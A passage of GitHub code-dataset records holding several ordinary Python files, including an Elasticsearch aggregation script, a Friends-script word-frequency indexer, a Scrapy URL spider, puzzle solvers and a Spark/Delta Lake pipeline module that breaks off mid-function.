logger.error(\"response format unexpected\")\r\n return None\r\n\r\n # Start extracting from the nested aggs and start flattening\r\n reindexed_docs = []\r\n for s_bucket in status_buckets:\r\n try:\r\n reindexed_docs.append({\r\n 'status': s_bucket['key'],\r\n '@timestamp': agg_response['interval_timestamp'],\r\n 'doc_count_total': s_bucket['doc_count'],\r\n 'interval': agg_response['interval']\r\n })\r\n except KeyError as e:\r\n logger.error(\"required fields missing in response %s\" % repr(e))\r\n return None\r\n\r\n for agg_key in agg_keys:\r\n if (agg_key in s_bucket):\r\n subagg_buckets = s_bucket[agg_key]['buckets']\r\n for _sab in subagg_buckets:\r\n reindexed_docs.append({\r\n 'status': s_bucket['key'],\r\n '@timestamp': agg_response['interval_timestamp'],\r\n 'interval': agg_response['interval'],\r\n agg_key: _sab['key'],\r\n 'doc_count': _sab['doc_count']\r\n })\r\n\r\n return(reindexed_docs)\r\n\r\n\r\ndef gen_subagg_query(primary, secondaries):\r\n\r\n q_template = {\r\n \"query\": {\r\n \"range\": {\r\n \"@timestamp\": {\r\n # default five minutes\r\n \"gte\": long((time.time() - 300) * 1000),\r\n \"lte\": long(time.time() * 1000),\r\n \"format\": \"epoch_millis\"\r\n }\r\n }\r\n },\r\n \"aggs\": {\r\n (\"%s\" % primary): {\r\n \"terms\": {\r\n \"field\": primary\r\n }\r\n }\r\n },\r\n \"size\": 0\r\n }\r\n\r\n # setup the secondary aggregations\r\n q_template['aggs'][primary]['aggs'] = {}\r\n for _agg in secondaries:\r\n q_template['aggs'][primary]['aggs'][_agg] = {\r\n \"terms\": { \"field\": _agg }\r\n }\r\n\r\n return (q_template)\r\n\r\n\r\ndef main():\r\n\r\n logger = logging.getLogger(__name__)\r\n es_cred = None\r\n try:\r\n with open('auth.yml') as f:\r\n es_cred = yaml.load(f)['creds']\r\n except Exception as e:\r\n # log error\r\n raise e\r\n\r\n with open('clusters.yml') as f:\r\n clusters = yaml.load(f)\r\n\r\n logging.info(\"contacting cluster...\")\r\n test_es = elasticsearch.Elasticsearch(\r\n hosts=[{'host': 'localhost', 'port': '9200'}],\r\n sniff_on_start=False,\r\n sniff_on_connection_fail=False,\r\n http_auth=(es_cred['user'], es_cred['pass']))\r\n\r\n\r\n\r\n interval_duration = '15m'\r\n # timestamps are still in seconds at this point...\r\n _set_ts = long(time.time())\r\n interval_end = _set_ts - (_set_ts % interval_names[interval_duration])\r\n interval_start = interval_end - interval_names[interval_duration]\r\n # convert to milliseconds\r\n interval_end = interval_end * 1000\r\n interval_start = interval_start * 1000\r\n interval_delta = interval_names[interval_duration] * 1000\r\n\r\n run_thirty_days = int(60/15) * 24 * 30\r\n\r\n # generate the aggregation query\r\n agg_query_json = gen_subagg_query('status', agg_keys)\r\n for i in range(run_thirty_days):\r\n interval_end = interval_end - interval_delta\r\n interval_start = interval_start - interval_delta\r\n\r\n agg_query_json['query']['range']['@timestamp']['gte'] = interval_start\r\n agg_query_json['query']['range']['@timestamp']['lte'] = interval_end\r\n\r\n # submit the query and add the timestamp info to the response\r\n logger.debug(\"submitting query: %s\" %\r\n json.dumps(agg_query_json, indent=4))\r\n try:\r\n ridx_aggs = test_es.search(index='filebeat-*', body=agg_query_json)\r\n except (elasticsearch.ConnectionError, elasticsearch.ConnectionTimeout) as e:\r\n logger.error(\"could not complete query %s\", repr(e))\r\n continue\r\n\r\n ridx_aggs['interval'] = interval_duration\r\n ridx_aggs['interval_timestamp'] = interval_end\r\n\r\n doc_list = reindex_aggregation(ridx_aggs)\r\n\r\n for doc in doc_list:\r\n try:\r\n test_es.index(\r\n index='test_status_count_summary',\r\n doc_type='doc',\r\n body=json.dumps(doc))\r\n except (elasticsearch.ConnectionError, elasticsearch.ConnectionTimeout) as e:\r\n logger.error(\"could not complete query %s\", repr(e))\r\n continue\r\n\r\n print (\"ran iteration %d\" % i)\r\n\r\n sys.exit(0)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"rickgarcia/elastic-monitoring","sub_path":"status_count.py","file_name":"status_count.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19106003765","text":"from indexing_matrix import indexing_matrix\nfrom indexing_dictionary import indexing_dictionary\nfrom preprocessing import preprocessing\nimport os\nimport numpy as np\nfrom nltk.corpus import stopwords\n\n\ndef main():\n stop_words = stopwords.words('russian')\n names = ('моника', 'мон', 'рэйчел', 'рейч', 'чендлер', 'чэндлер', 'чен',\n 'фиби', 'фибс', 'росс', 'джоуи', 'джои',\n 'джо') # кортеж для того, чтобы имена не стали жертвой чрезмерной лемматизации\n curr_dir = os.getcwd()\n filepath = os.path.join(curr_dir, 'friends-data/')\n dirfiles = os.listdir(filepath) # получаем путь до наших данных\n\n texts = [] # список текстов, по которому будем проходиться\n for season in dirfiles:\n season_path = os.path.join(filepath, f'{season}/')\n for script in os.listdir(season_path):\n with open(os.path.join(filepath, f'{season}/{script}'), 'r', encoding='utf-8') as file:\n texts.append(preprocessing(file.read(), stop_words, names)) # каждую серию обрабатываем отдельно, затем\n # складываем обработанный текст в список\n\n our_matrix = indexing_matrix(texts) # матрица\n our_dictionary = indexing_dictionary(texts) # словарь\n\n with open('matrix_data.txt', 'w', encoding='utf-8') as file:\n max_freq = 0\n for line in np.transpose(our_matrix[0].toarray()): # транспонируем матрицу и ищем максимальную частотность слов\n # по сумме употреблений в документах\n max_freq = max(max_freq, sum(line))\n max_freq_words = set()\n for index, line in enumerate(np.transpose(our_matrix[0].toarray())): # снова проходим по матрице и ищем слова с\n # частотностью, равной максимальной\n if sum(line) == max_freq:\n max_freq_words.add(our_matrix[1][index])\n file.write(f'Самое частотное слово - {max_freq_words}. Оно повторяется {max_freq} раз.\\n\\n')\n\n min_freq = 1\n for line in np.transpose(our_matrix[0].toarray()): # проделываем то же самое, что и выше, однако уже для\n # минимальной частотности\n min_freq = min(min_freq, sum(line))\n min_freq_words = set()\n for index, line in enumerate(np.transpose(our_matrix[0].toarray())):\n if sum(line) == min_freq:\n min_freq_words.add(our_matrix[1][index])\n file.write(f'Самые редкие слова: {\", \".join(min_freq_words)}. Каждое из них повторяется {min_freq} раз.\\n\\n')\n\n words_everywhere = set() # словарь слов, которые повторяются в каждом документе\n for index, line in enumerate(np.transpose(our_matrix[0].toarray())): # в транспонированной матрице ищем строки,\n # где есть хотя бы одно повторение слова во всех документах, а затем добавляем их в словарь\n line_set = set(line)\n if 0 not in line_set:\n words_everywhere.add(our_matrix[1][index])\n file.write(f'Слова, которые появляются во всех документах: {\", \".join(words_everywhere)}.\\n\\n')\n\n pre_names_freq = {} # словарь всех имен\n for index, line in enumerate(\n np.transpose(our_matrix[0].toarray())): # транспонируем матрицу и ищем все имена и их частотности\n if our_matrix[1][index] in names:\n pre_names_freq[our_matrix[1][index]] = sum(line)\n names_freq = {\n 'моника': pre_names_freq['моника'] + pre_names_freq['мон'],\n 'рэйчел': pre_names_freq['рэйчел'] + pre_names_freq['рейч'],\n 'чендлер': pre_names_freq['чендлер'] + pre_names_freq['чэндлер'] + pre_names_freq['чен'],\n 'фиби': pre_names_freq['фиби'] + pre_names_freq['фибс'],\n 'росс': pre_names_freq['росс'],\n 'джоуи': pre_names_freq['джоуи'] + pre_names_freq['джои'] + pre_names_freq['джо']\n } # объединяем некоторые имена для того, чтобы иметь полные, связанные данные (очень плохой способ, но я не смог\n # придумать лучше, если вам тоже не понравится - напишите мне, пожалуйста, как можно сделать лучше\n file.write(\n f'Самый популярный персонаж - {max(names_freq, key=names_freq.get)}, он встречается {names_freq[max(names_freq, key=names_freq.get)]} раз.\\n\\n')\n\n with open('dictionary_data.txt', 'w', encoding='utf-8') as file:\n max_freq = 0\n for elem in our_dictionary: # в словаре ищем самую большую частотность слова\n max_freq = max(sum(our_dictionary[elem].values()), max_freq)\n max_freq_words = set()\n for elem in our_dictionary: # ищем слово/слова с самой большой частотностью\n if sum(our_dictionary[elem].values()) == max_freq:\n max_freq_words.add(elem)\n file.write(f'Самое частотное слово - {max_freq_words}. Оно повторяется {max_freq} раз.\\n\\n')\n\n min_freq = 1\n for elem in our_dictionary: # в словаре ищем наименьшую частотность слова\n min_freq = min(sum(our_dictionary[elem].values()), min_freq)\n min_freq_words = set()\n for elem in our_dictionary: # ищем слово/слова с наименьшей частотностью\n if sum(our_dictionary[elem].values()) == min_freq:\n min_freq_words.add(elem)\n file.write(f'Самые редкие слова: {\", \".join(min_freq_words)}. Каждое из них повторяется {min_freq} раз.\\n\\n')\n\n words_everywhere = set()\n for elem in our_dictionary: # ищем ключ словаря, значением которого является словарь длиной 165 (165 - количество всех документов)\n if len(our_dictionary[elem]) == 165:\n words_everywhere.add(elem)\n file.write(f'Слова, которые появляются во всех документах: {\", \".join(words_everywhere)}.\\n\\n')\n\n pre_names_freq = {}\n for elem in our_dictionary: # ищем в словаре имена и их частотности\n if elem in names:\n for text in our_dictionary[elem]:\n pre_names_freq[elem] = our_dictionary[elem][text] + pre_names_freq.get(elem, 0)\n names_freq = {\n 'моника': pre_names_freq['моника'] + pre_names_freq['мон'],\n 'рэйчел': pre_names_freq['рэйчел'] + pre_names_freq['рейч'],\n 'чендлер': pre_names_freq['чендлер'] + pre_names_freq['чэндлер'] + pre_names_freq['чен'],\n 'фиби': pre_names_freq['фиби'] + pre_names_freq['фибс'],\n 'росс': pre_names_freq['росс'],\n 'джоуи': pre_names_freq['джоуи'] + pre_names_freq['джои'] + pre_names_freq['джо']\n } # объединяем некоторые имена для того, чтобы иметь полные, связанные данные\n file.write(\n f'Самый популярный персонаж - {max(names_freq, key=names_freq.get)}, он встречается {names_freq[max(names_freq, key=names_freq.get)]} раз.\\n\\n')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"IgorDyatlov/infosearch22","sub_path":"infosearch_dz_1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2413988862","text":"import scrapy\r\nfrom ..items import ImagesScraperItem\r\nimport csv\r\n\r\n\r\nclass ImagesFamousBirthdaysSpider(scrapy.Spider):\r\n name = 'url'\r\n URLs_list = []\r\n final_urls = []\r\n start_urls = []\r\n with open(\"F:/CODE/Ezra's Script/URLs.csv\", 'r')as f:\r\n data = csv.reader(f)\r\n for row in data:\r\n for link in row:\r\n start_urls.append(link)\r\n start_urls.pop(0)\r\n print(len(start_urls))\r\n\r\n def parse(self, response):\r\n items = ImagesScraperItem()\r\n urls = response.css('a.face::attr(href)').extract()\r\n\r\n for href in urls:\r\n ImagesFamousBirthdaysSpider.URLs_list.append(href)\r\n\r\n url_set = (ImagesFamousBirthdaysSpider.URLs_list)\r\n for link in url_set:\r\n if \"https://www.\" in link:\r\n ImagesFamousBirthdaysSpider.final_urls.append(link)\r\n else:\r\n pass\r\n\r\n for url in ImagesFamousBirthdaysSpider.final_urls:\r\n items['Urls'] = url\r\n\r\n yield items\r\n","repo_name":"KaleemArshad/Scraping-Downloading-Bulk-Images","sub_path":"Code/Images_Scraper/Images_Scraper/spiders/Url_Scraper.py","file_name":"Url_Scraper.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31598143178","text":"from collections import deque\n\ndef evaluate(d, part=\"a\"):\n op = \"*\"\n val = None\n prev = 1\n while d:\n tok = d.popleft()\n if tok == \"(\":\n val = evaluate(d, part=part)\n elif tok.isdigit():\n val = int(tok)\n elif tok in \"+*\":\n op = tok\n elif tok == \")\":\n\n return prev\n if val is not None:\n\n if op == \"+\":\n prev += val\n elif op == \"*\":\n if part == \"b\":\n while d and d[0] == \"+\":\n d.popleft()\n r = d.popleft()\n if r.isdigit():\n val += int(r)\n elif r == \"(\":\n val += evaluate(d, part=part)\n prev *= val\n val = None\n\n return prev\n\nlines = open(f\"day18/test.txt\", \"r\").read().replace(\" \", \"\").splitlines()\nprint(\"part a:\", sum([evaluate(deque(line), part=\"a\") for line in lines]))\nprint(\"part b:\", sum([evaluate(deque(line), part=\"b\") for line in lines]))\n\n\n\"\"\"\nPart 1: 26335\nPart 2: 693891\n\n5 + (8 * 3 + 9 + 3 * 4 * 3)\n5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))\n((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2\n\"\"\"","repo_name":"jamescalnan/AdventOfCode","sub_path":"advent-of-code-2020/day18/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11735540","text":"#!/usr/bin/env python\r\n\r\nfrom collections import defaultdict\r\n\r\nimport re\r\nimport sys\r\n\r\nprojects = defaultdict(list)\r\nepilogue = []\r\n\r\ninput_data = sys.stdin.readlines()\r\nfor line in input_data:\r\n m = re.match('(\\d+)>', line)\r\n if m:\r\n projects[m.group(1)].append(line)\r\n else:\r\n epilogue.append(line)\r\n\r\ntry:\r\n eol = re.search('\\s+$', input_data[0]).group()\r\nexcept:\r\n eol = '\\n'\r\n\r\nfor num in sorted(projects.keys(), key=int):\r\n sys.stdout.write(''.join(projects[num])+eol)\r\nsys.stdout.write(''.join(epilogue))\r\n","repo_name":"tgandor/meats","sub_path":"log_analysis/msvc_sort.py","file_name":"msvc_sort.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"38715011692","text":"\"\"\"\nProblem:\n\nAll the disks start off on the first rod in a stack. They are ordered by size, with the\nlargest disk on the bottom and the smallest one at the top.\n\nThe goal of this puzzle is to move all the disks from the first rod to the last rod\nwhile following these rules:\n\nYou can only move one disk at a time.\nA move consists of taking the uppermost disk from one of the stacks and placing it on\ntop of another stack.\nYou cannot place a larger disk on top of a smaller disk.\nWrite a function that prints out all the steps necessary to complete the Tower of Hanoi.\nYou should assume that the rods are numbered, with the first rod being 1, the second\n(auxiliary) rod being 2, and the last (goal) rod being 3.\n\nFor example, with n = 3, we can do this in 7 moves:\n\nMove 1 to 3\nMove 1 to 2\nMove 3 to 2\nMove 1 to 3\nMove 2 to 1\nMove 2 to 3\nMove 1 to 3\n\"\"\"\n\nfrom typing import Optional\n\n\ndef towers_of_hanoi(\n n: int,\n start_rod: Optional[str] = None,\n aux_rod: Optional[str] = None,\n end_rod: Optional[str] = None,\n) -> None:\n # initializing the names for the rods [using different convention from the one\n # mentioned in the question]\n if not start_rod:\n start_rod = \"start_rod\"\n print(\n f\"\\nTower of Hanoi for {n} Disks ========================================\"\n )\n if not aux_rod:\n aux_rod = \"aux_rod\"\n if not end_rod:\n end_rod = \"end_rod\"\n # if the number of disks left to move is 1, its shifted [base case for recursion]\n if n == 1:\n print(f\"Move disk 1 from {start_rod} to {end_rod}\")\n return\n\n # moving the top disk of the start rod to the proper position in the auxilary rod\n # using the end rod as buffer\n towers_of_hanoi(n - 1, start_rod, end_rod, aux_rod)\n # moving the top disk from the start rod to the end rod\n print(f\"Move disk {n} from {start_rod} to {end_rod}\")\n # moving the top disk of the auxilary rod to the proper position in the end rod\n # using the start rod as buffer\n towers_of_hanoi(n - 1, aux_rod, start_rod, end_rod)\n\n\nif __name__ == \"__main__\":\n towers_of_hanoi(3)\n towers_of_hanoi(4)\n towers_of_hanoi(5)\n towers_of_hanoi(6)\n\n\n\"\"\"\nSPECS:\n\nTIME COMPLEXITY: O(2 ^ n)\nSPACE COMPLEXITY: O(n)\n\"\"\"\n","repo_name":"ruppysuppy/Daily-Coding-Problem-Solutions","sub_path":"Solutions/128.py","file_name":"128.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":444,"dataset":"github-code","pt":"67"} +{"seq_id":"31676987013","text":"import random\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s-%(name)s-%(levelname)s-%(message)s')\n\ndef hello():\n print('hello!你好!')\n\ndef hi(name):\n print(f'hi!{name}!')\n\ndef getAnswer(number):\n if number:\n return f'数字是{number}!'\n\ndef big_or_small():\n print('请输入一个数字:')\n number = input()\n r = random.randint(1, 100)\n answer = getAnswer(r)\n if int(number) < int(r):\n logging.debug(number)\n logging.debug(answer)\n print('太小了')\n \n\nif __name__ == '__main__':\n hello()\n hello()\n hi('yy')\n hi('hbpu')\n big_or_small()\n\n","repo_name":"hbpu/autoPython","sub_path":"function/3.1.py","file_name":"3.1.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33093699718","text":"import json\nimport os \nfrom pyspark import SparkConf\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\nfrom sys import argv\nimport shutil\nfrom delta import *\nimport pyspark\nfrom delta.tables import *\nimport argparse\nimport time\nimport tempfile\nimport uuid\nimport logging\nimport cddp.ingestion as cddp_ingestion\n\n# disable informational messages from prophet\nlogging.getLogger('py4j').setLevel(logging.ERROR)\n\n\nstorage_format = \"delta\"\n\ndef create_spark_session():\n \"\"\"Creates a Spark Session\"\"\"\n builder = pyspark.sql.SparkSession.builder.appName(\"MyApp\") \\\n .config(\"spark.sql.extensions\", \"io.delta.sql.DeltaSparkSessionExtension\") \\\n .config(\"spark.sql.catalog.spark_catalog\", \"org.apache.spark.sql.delta.catalog.DeltaCatalog\")\n spark = configure_spark_with_delta_pip(builder).getOrCreate()\n return spark\n\ndef init(spark, config, working_dir):\n \"\"\"Delete the folders for the data storage\"\"\"\n current_dir_path = os.path.dirname(os.path.realpath(__file__))\n if working_dir is None:\n working_dir = current_dir_path\n config['working_dir'] = working_dir\n\n app_name = config['name']\n config['app_data_path'] = f\"{config['working_dir']}/{app_name}/\"\n config['staging_path'] = f\"{config['working_dir']}/{app_name}/staging\"\n config['standard_path'] = f\"{config['working_dir']}/{app_name}/standard\"\n config['serving_path'] = f\"{config['working_dir']}/{app_name}/serving\"\n \n\n print(f\"\"\"app name: {config[\"name\"]},\n landing path: {config['landing_path']},\n staging path: {config['staging_path']},\n standard path: {config['standard_path']},\n serving path: {config['serving_path']},\n working dir:{config['working_dir']},\n \"\"\")\n\n\n\ndef init_database(spark, config):\n app_name = config['name']\n spark.sql(f\"CREATE SCHEMA IF NOT EXISTS {app_name}\")\n spark.sql(f\"USE SCHEMA {app_name}\")\n\ndef clean_database(spark, config):\n app_name = config['name']\n current_dir_path = os.path.dirname(os.path.realpath(__file__))\n database_path = f\"{current_dir_path}/spark-warehouse/{app_name}.db/\"\n if os.path.exists(config['app_data_path']):\n shutil.rmtree(config['app_data_path'])\n if os.path.exists(database_path):\n shutil.rmtree(database_path)\n\n spark.sql(f\"DROP SCHEMA IF EXISTS {app_name} CASCADE \")\n\n\ndef load_config(config_path) :\n \"\"\"Loads the configuration file\"\"\"\n with open(f\"{config_path}\", 'r') as f:\n config = json.load(f)\n return config\n\n\ndef start_staging_job(spark, config, task, timeout=None):\n \"\"\"Creates the staging job\"\"\"\n schema = StructType.fromJson(task[\"schema\"])\n location = task[\"location\"]\n target = task[\"target\"]\n type = task[\"type\"]\n output = task[\"output\"]\n format = task[\"format\"]\n landing_path = config[\"landing_path\"]\n staging_path = config[\"staging_path\"]\n df, is_streaming = cddp_ingestion.start_ingestion_task(task, spark)\n if is_streaming:\n if \"table\" in output:\n query = df.writeStream\\\n .format(storage_format) \\\n .outputMode(\"append\")\\\n .option(\"checkpointLocation\", staging_path+\"/\"+target+\"_chkpt\")\\\n .toTable(target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"file\" in output:\n query = df.writeStream \\\n .format(storage_format) \\\n .outputMode(\"append\") \\\n .option(\"checkpointLocation\", staging_path+\"/\"+target+\"_chkpt\") \\\n .start(staging_path+\"/\"+target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n else:\n if \"table\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n if \"file\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").save(staging_path+\"/\"+target)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n\n\n # if type == \"streaming\":\n # df = spark \\\n # .readStream \\\n # .format(format) \\\n # .option(\"multiline\", \"true\") \\\n # .option(\"header\", \"true\") \\\n # .schema(schema) \\\n # .load(landing_path+\"/\"+location) \n\n # if \"table\" in output:\n # query = df.writeStream\\\n # .format(storage_format) \\\n # .outputMode(\"append\")\\\n # .option(\"checkpointLocation\", staging_path+\"/\"+target+\"_chkpt\")\\\n # .toTable(target)\n # if timeout is not None:\n # query.awaitTermination(timeout)\n # if \"file\" in output:\n # query = df.writeStream \\\n # .format(storage_format) \\\n # .outputMode(\"append\") \\\n # .option(\"checkpointLocation\", staging_path+\"/\"+target+\"_chkpt\") \\\n # .start(staging_path+\"/\"+target)\n # if timeout is not None:\n # query.awaitTermination(timeout)\n # if \"view\" in output:\n # df.createOrReplaceTempView(target)\n # elif type == \"batch\":\n # df = spark \\\n # .read \\\n # .format(format) \\\n # .option(\"multiline\", \"true\") \\\n # .option(\"header\", \"true\") \\\n # .schema(schema) \\\n # .load(landing_path+\"/\"+location) \n\n # if \"table\" in output:\n # df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n # if \"file\" in output:\n # df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").save(staging_path+\"/\"+target)\n # if \"view\" in output:\n # df.createOrReplaceTempView(target)\n # else :\n # raise Exception(\"Invalid type\")\n \n\ndef start_standard_job(spark, config, task, need_load_views=True, timeout=None):\n \"\"\"Creates the standard job\"\"\"\n standard_path = config[\"standard_path\"]\n sql = task[\"sql\"]\n output = task[\"output\"]\n if(isinstance(sql, list)):\n sql = \" \\n\".join(sql)\n target = task[\"target\"]\n if need_load_views:\n load_staging_views(spark, config)\n df = spark.sql(sql)\n type = \"batch\"\n if \"type\" in task:\n type = task[\"type\"]\n if type == \"streaming\":\n if \"table\" in output:\n query = df.writeStream\\\n .format(storage_format) \\\n .outputMode(\"append\")\\\n .option(\"checkpointLocation\", standard_path+\"/\"+target+\"_chkpt\")\\\n .toTable(target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"file\" in output:\n query = df.writeStream \\\n .format(storage_format) \\\n .outputMode(\"append\") \\\n .option(\"checkpointLocation\", standard_path+\"/\"+target+\"_chkpt\") \\\n .start(standard_path+\"/\"+target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n elif type == \"batch\":\n if \"table\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n if \"file\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").save(standard_path+\"/\"+target)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n else :\n raise Exception(\"Invalid type\")\n\n\ndef start_serving_job(spark, config, task, need_load_views=True, timeout=None):\n \"\"\"Creates the serving job\"\"\"\n serving_path = config[\"serving_path\"]\n sql = task[\"sql\"]\n output = task[\"output\"]\n if(isinstance(sql, list)):\n sql = \" \\n\".join(sql)\n target = task[\"target\"]\n type = \"batch\"\n if \"type\" in task:\n type = task[\"type\"]\n if need_load_views:\n load_staging_views(spark, config)\n load_standard_views(spark, config)\n df = spark.sql(sql)\n if type == \"streaming\":\n if \"table\" in output:\n query = df.writeStream\\\n .format(storage_format) \\\n .outputMode(\"complete\")\\\n .option(\"checkpointLocation\", serving_path+\"/\"+target+\"_chkpt\")\\\n .toTable(target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"file\" in output:\n query = df.writeStream \\\n .format(storage_format) \\\n .outputMode(\"complete\") \\\n .option(\"checkpointLocation\", serving_path+\"/\"+target+\"_chkpt\") \\\n .start(serving_path+\"/\"+target)\n if timeout is not None:\n query.awaitTermination(timeout)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n\n elif type == \"batch\":\n if \"table\" in output:\n df.write.format(storage_format).mode(\"overwrite\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n if \"file\" in output:\n df.write.format(storage_format).mode(\"overwrite\").option(\"overwriteSchema\", \"true\").save(serving_path+\"/\"+target)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n else :\n raise Exception(\"Invalid type\")\n\ndef load_staging_views(spark, config):\n landing_path = config[\"landing_path\"]\n if 'staging' in config:\n for task in config[\"staging\"]:\n schema = StructType.fromJson(task[\"schema\"])\n location = task[\"location\"]\n target = task[\"target\"]\n type = task[\"type\"]\n output = task[\"output\"]\n format = task[\"format\"]\n if type == \"streaming\" and \"view\" in output:\n df = spark \\\n .readStream \\\n .format(format) \\\n .option(\"multiline\", \"true\") \\\n .option(\"header\", \"true\") \\\n .schema(schema) \\\n .load(landing_path+\"/\"+location) \n df.createOrReplaceTempView(target)\n elif type == \"batch\" and \"view\" in output:\n df = spark \\\n .read \\\n .format(format) \\\n .option(\"multiline\", \"true\") \\\n .option(\"header\", \"true\") \\\n .schema(schema) \\\n .load(landing_path+\"/\"+location) \n df.createOrReplaceTempView(target)\n\n\ndef load_standard_views(spark, config):\n if 'standard' in config:\n for task in config[\"standard\"]:\n sql = task[\"sql\"]\n output = task[\"output\"]\n if(isinstance(sql, list)):\n sql = \" \\n\".join(sql)\n target = task[\"target\"]\n df = spark.sql(sql)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n\ndef show_serving_dataset(spark, config, task):\n \"\"\"Shows the serving dataset\"\"\"\n serving_path = f\"{config['working-dir']}/{config['name']}/serving\"\n target = task[\"target\"]\n df = spark.read.format(storage_format).load(serving_path+\"/\"+target)\n df.show()\n\ndef get_dataset_as_json(spark, config, stage, task, limit=20):\n \"\"\"Shows the serving dataset\"\"\"\n staging_path = f\"{config['working_dir']}/{config['name']}/staging\"\n standard_path = f\"{config['working_dir']}/{config['name']}/standard\"\n serving_path = f\"{config['working_dir']}/{config['name']}/serving\"\n task_type = task[\"type\"]\n task_output = task[\"output\"]\n app_name = config[\"name\"]\n spark.sql(f\"USE SCHEMA {app_name}\")\n if \"view\" in task_output and task_type != \"streaming\":\n target = task[\"target\"]\n df = spark.sql(\"select * from \"+target+\" limit \"+str(limit))\n return df.toJSON().map(lambda j: json.loads(j)).collect()\n elif \"table\" in task_output:\n target = task[\"target\"]\n df = spark.sql(\"select * from \"+target+\" limit \"+str(limit))\n return df.toJSON().map(lambda j: json.loads(j)).collect()\n elif \"file\" in task_output:\n target = task[\"target\"]\n path = None\n if stage == \"staging\":\n path = staging_path \n elif stage == \"standard\":\n path = standard_path\n elif stage == \"serving\":\n path = serving_path\n else:\n raise Exception(\"Invalid stage\")\n df = spark.read.format(storage_format).load(path+\"/\"+target)\n df.createOrReplaceTempView(\"tmp_\"+target)\n df = spark.sql(\"select * from tmp_\"+target+ \" limit \"+str(limit))\n return df.toJSON().map(lambda j: json.loads(j)).collect()\n else:\n raise Exception(\"Invalid output\")\n\n\ndef entrypoint():\n parser = argparse.ArgumentParser(description='Process Data pipeline')\n parser.add_argument('--config-path', help='path to pipeline config file', required=True)\n parser.add_argument('--landing-path', help='path to data landing zone', required=True)\n parser.add_argument('--working-dir', help='folder to store data of stages, the default value is a random tmp folder', required=False)\n parser.add_argument('--stage', help='run a task in the specified stage', required=False)\n parser.add_argument('--task', help='run a specified task', required=False)\n parser.add_argument('--show-result', type=bool, default=False, help='flag to show task data result', required=False)\n parser.add_argument('--await-termination', type=int, help='how many seconds to wait before streaming job terminating, no specified means not terminating.', required=False)\n\n args = parser.parse_args()\n\n config_path = args.config_path\n awaitTermination = args.await_termination\n stage_arg = args.stage\n task_arg = args.task\n working_dir = args.working_dir\n landing_path = args.landing_path\n show_result = args.show_result\n\n\n config = load_config(config_path)\n config['landing_path'] = landing_path\n config['working_dir'] = working_dir\n\n spark = create_spark_session()\n \n print(f\"\"\"app name: {config[\"name\"]},\n config path: {config_path},\n landing path: {config['landing_path']},\n working dir:{config['working_dir']},\n stage: {stage_arg},\n task: {task_arg}, \n show_result: {show_result}, \n streaming job waiting for {str(awaitTermination)} seconds before terminating\n \"\"\")\n\n init(spark, config, working_dir)\n init_database(spark, config)\n if 'staging' in config and (stage_arg is None or stage_arg == \"staging\"):\n for task in config[\"staging\"]:\n if task_arg is None or task['name'] == task_arg:\n start_staging_job(spark, config, task, awaitTermination)\n if 'standard' in config and (stage_arg is None or stage_arg == \"standard\"):\n for task in config[\"standard\"]:\n if task_arg is None or task['name'] == task_arg:\n start_standard_job(spark, config, task, awaitTermination)\n if 'serving' in config and (stage_arg is None or stage_arg == \"serving\"):\n for task in config[\"serving\"]:\n if task_arg is None or task['name'] == task_arg:\n start_serving_job(spark, config, task, awaitTermination)\n if show_result:\n print(get_dataset_as_json(spark, config, \"serving\", task))\n\n\ndef wait_for_next_stage(): \n parser = argparse.ArgumentParser(description='Wait for the next stage')\n parser.add_argument('--duration', type=int, default=10, help='how many seconds to wait', required=False)\n args = parser.parse_args()\n print(f\"waiting for {args.duration} seconds to next stage\")\n time.sleep(args.duration)\n\ndef load_sample_data(spark, data_str, format=\"json\"):\n\n # save data_str to temp file\n temp_file = tempfile.NamedTemporaryFile(delete=False)\n temp_file.write(data_str.encode())\n temp_file.close()\n # print(\"temp file path: \"+temp_file.name)\n file_path = temp_file.name\n # file_path = \"./example/data/fruit-price/tmpasfs2n8k\"\n if format == \"json\":\n # read json file to dataframe\n df = spark \\\n .read \\\n .format(\"json\") \\\n .option(\"header\", \"true\") \\\n 